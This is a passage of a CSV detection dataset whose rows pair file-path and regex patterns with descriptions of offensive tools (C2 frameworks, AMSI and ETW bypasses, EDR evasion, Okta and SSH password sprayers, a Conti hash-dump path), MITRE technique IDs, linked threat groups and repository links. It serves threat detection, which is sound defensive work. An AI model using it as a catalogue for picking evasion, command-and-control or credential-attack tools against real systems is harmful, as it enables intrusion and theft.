Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","9415"
"*/opt/localtonet*",".{0,1000}\/opt\/localtonet.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#linux","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","9416"
"*/opt/lwp-scripts*",".{0,1000}\/opt\/lwp\-scripts.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","9417"
"*/opt/lwp-wordlists*",".{0,1000}\/opt\/lwp\-wordlists.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","9418"
"*/opt/merlin/*",".{0,1000}\/opt\/merlin\/.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","9419"
"*/opt/metasploit-framework*",".{0,1000}\/opt\/metasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#linux","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","9420"
"*/opt/nessus/*",".{0,1000}\/opt\/nessus\/.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","9421"
"*/opt/Ninja/*",".{0,1000}\/opt\/Ninja\/.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9422"
"*/opt/Password_Cracking/*",".{0,1000}\/opt\/Password_Cracking\/.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","9423"
"*/opt/periscope/ControlCenter/db/periscope.db*",".{0,1000}\/opt\/periscope\/ControlCenter\/db\/periscope\.db.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","9424"
"*/opt/PoshC2*",".{0,1000}\/opt\/PoshC2.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9425"
"*/opt/Projects/AmsiBypass/*",".{0,1000}\/opt\/Projects\/AmsiBypass\/.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","#linux","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","9426"
"*/opt/rai/*",".{0,1000}\/opt\/rai\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","9427"
"*/opt/seclists/Discovery/*",".{0,1000}\/opt\/seclists\/Discovery\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","9430"
"*/opt/shellcode/blocketw.bin*",".{0,1000}\/opt\/shellcode\/blocketw\.bin.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#content","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","9431"
"*/opt/sliver-server*",".{0,1000}\/opt\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#linux","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","9432"
"*/optiv/Dent/*",".{0,1000}\/optiv\/Dent\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","1","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","9434"
"*/optiv/Freeze/*",".{0,1000}\/optiv\/Freeze\/.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","9435"
"*/oracle-brute.nse*",".{0,1000}\/oracle\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9436"
"*/oracle-brute-stealth.nse*",".{0,1000}\/oracle\-brute\-stealth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9437"
"*/oracle-enum-users.nse*",".{0,1000}\/oracle\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9438"
"*/oracle-patator.py*",".{0,1000}\/oracle\-patator\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","9439"
"*/oracle-scanner.py*",".{0,1000}\/oracle\-scanner\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","9440"
"*/oracle-sid-brute.nse*",".{0,1000}\/oracle\-sid\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9441"
"*/oracle-tnscmd.py*",".{0,1000}\/oracle\-tnscmd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","9442"
"*/oracle-tns-version.nse*",".{0,1000}\/oracle\-tns\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9443"
"*/orbitaldump.git*",".{0,1000}\/orbitaldump\.git.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","9444"
"*/oscp.profile*",".{0,1000}\/oscp\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","9445"
"*/OSEP-Code-Snippets.git*",".{0,1000}\/OSEP\-Code\-Snippets\.git.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","9446"
"*/osmedeus*",".{0,1000}\/osmedeus.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","9451"
"*/oSpray.py*",".{0,1000}\/oSpray\.py.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003 - T1621","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","#linux","N/A","10","1","70","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z","9452"
"*/OUned.git*",".{0,1000}\/OUned\.git.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","9453"
"*/ouned_smbserver.py*",".{0,1000}\/ouned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","9454"
"*/OUT:killer.exe*",".{0,1000}\/OUT\:killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","9455"
"*/out:revsocks.exe*",".{0,1000}\/out\:revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","#linux","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","9456"
"*/out:spacerunner.exe*",".{0,1000}\/out\:spacerunner\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","9457"
"*/outfile:C:\ProgramData\hashes.txt*",".{0,1000}\/outfile\:C\:\\ProgramData\\hashes\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9458"
"*/outflank_bofs/*",".{0,1000}\/outflank_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","9459"
"*/outflanknl/*",".{0,1000}\/outflanknl\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","9460"
"*/Out-Minidump.ps1*",".{0,1000}\/Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9461"
"*/output/payloads/*",".{0,1000}\/output\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","9462"
"*/output/ratchatPT*",".{0,1000}\/output\/ratchatPT.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","9463"
